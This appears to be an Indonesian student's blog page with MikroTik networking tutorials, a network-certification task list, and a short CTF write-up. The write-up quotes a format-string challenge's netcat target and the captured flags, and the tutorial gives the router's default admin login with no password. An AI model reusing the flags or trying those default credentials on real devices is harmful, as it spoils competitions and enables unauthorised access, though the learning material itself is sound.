Mengimplementasikan topologi jaringan di atas dengan ketentuan sebagai berikut :

1. Menerapkan prosedur kesehatan, keselamatan kerja dan keamanan kerja yang diperlukan

2. Melakukan pemasangan kabel UTP

3. Melakukan pemasangan non managable switch

4. Melakukan pemasangan dan konfigurasi jaringan lokal (LAN)

5. Melakukan pemasangan dan konfigurasi jaringan internet (WAN)

6. Melakukan pemasangan dan konfigurasi jaringan nirkabel (WLAN)

7. Melakukan instalasi dan konfigurasi Server/Router (WebProxy)

8. Melakukan instalasi dan konfigurasi DHCP Server

9. Melakukan konfigurasi Firewall pada router

10. Melakukan Pengujian dari PC Client yang terhubung kabel :

a. IP DHCP Client

b. Koneksi internet

c. Static DNS akses www.mikrotik.com menjadi http://bnsp-indonesia.org

d. Blocking ping dari client

e. Logging

f. Rule Filter mengijinkan permintaan HTTP dan HTTPS

11. Melakukan Pengujian dari Laptop Client yang terhubung wireless:

a. Blocking Site

b. Blocking File

c. Blocking content

Blocking akses internet pada waktu yang telah ditentukan

Cara Remote Mikrotik Dari Client

Posted on September 22, 2020 by Ilham

Tahapan Pertama untuk melakukan remote dari client
1. Download Iso Mikrotik

2. Download Gns3

3. Download VirtualBox

4. Download VMWare

dan disini hanya bersifat virtual namun settingannya sama seperti real.
– Pertama install mikrotiknya dan ada pada tutorial ini.

– Kedua Jika sudah install mikrotiknya lalu install gns3, virtualbox dan vmware semuanya ada di link ini (link menyusul)

– Ketiga jika sudah diinstall maka pada tahap selanjutnya masuk ke video ini.

– Keempat apabila ada trouble dengan iso mikrotik dll maka bisa lihat ke video ini

– Kelima apabila sudah maka Asumsi ip dari server atau mikrotik 192.168.1.1 dan untuk client atau xp 192.168.1.10 maka client XP akan remote mikrotik dengan ip 1.1 atau gatewaynya

– Keenam Apabila belum bisa diakses atau masih keadaan default maka ip nya 192.168.88.1 ip itu ip default mikrotik dengan username admin dan tidak ada passwordnya.

CTF Soal Moon Vampire Foresty

Posted on September 17, 2020 by Ilham

Soal CTF Moon Vampire

Pada soal diatas kita akan menemukan soal nc 13.94.25.85 2901, dengan syntax linux nc yaitu netcat, namun dibelakang file moon tersebut terdapat clue yang dimunculkan yaitu
pada saat download file Moon CTF

tahap pertama

buka file moon nya dengan menggunakan nano maka akan ketemu cluenya

ditemukan quietmoon hampir sama seperti writeup pada crossctf pada link ini

Tantangan ini hampir seperti serangan string format template. Pendekatan untuk memecahkan tantangan ini mirip dengan artikel serangan string format saya yang lain. Saya mungkin akan memperbaiki artikel lebih lanjut tetapi untuk saat ini, solusinya dapat ditemukan here in Python.

# ./solve.py 
[+] Opening connection to ctf.pwn.sg on port 2901: Done
[+] CrossCTF{about_thr33_th1ngs_1_w4s_abs0lutely_cert41n}
[*] Closed connection to ctf.pwn.sg port 2901

maka flag nya dapat dit
emukan namun format flagnya dalam soal berbeda namun hasilnya akan sama

gemastik12

GNS3 Virtualbox Mikrotik

Posted on September 14, 2020 by Ilham

Nama : Ilham Idfiana

Kls : D3TK-42-02

Nim : 6702184010

Tata Cara Setting Gns3 Mikrotik

– Gambar Topologi

– Aktifkan GNS3Vm Preferensi sebagai integrasi atau penghubung ke virtualbox

– Pada menu ini ialah untuk menambah dari img yang sudah install yang menjadi bootable atau sebagai routerOs

– Pada tahap selanjutnya ialah menambah Qemu mikrotiknya yang akan dijadikan routernya

– Pada selanjutnya atur kapasitas ram dan binary nya untuk dijalankan routerOS nya

– Pada tahap ini ialah memilih img atau bootable yang sudah install sebelumnya yang menjadi format img untuk dijalankan routerOS nya

– Menambah client Virtualbox untuk dijadikan sebagai menampilkan GUI dari routerOS

– Aktifkan semua komponennya untuk disetting routernya

– Pada tahap selanjutnya jalankan router mikrotiknya dengan mode console, lalu setting alamat IP

o Asumsi ip dengan metode NAT maka ip yang didapatkan yaitu secara DHCP atau secara otomatis

– Pada gambar dibawah ialah ketika dijalankan melalui virtualbox dengan windows XP dan masuk ke winbox.

o Pada ether1 Dhcp yang didapatkan dari adapter Vmnet8 yang langsung terhubung ke internet

o Ether2 untuk client yang akan menguji koneksi antara Laptop > Gns3 > Virtualbox

– Pada gambar dibawah ialah setting untuk DNS agar bisa terkoneksi dengan internet, dan menggunakan ip dns dari google dan juga bisa melalui open Dns

– Setting gateway disini ialah masuk ke 192.168.19.2 yaitu alamat dns dari vmnet yang di bridge dari internet atau WAN

– Pengujian dari winbox atau telnetnya, dan client

L

Link Referensi :

https://www.youtube.com/watch?v=yg-F2WKibDM&feature=youtu.be

https://youtu.be/K-9xpNGEWoU

Raijua Webste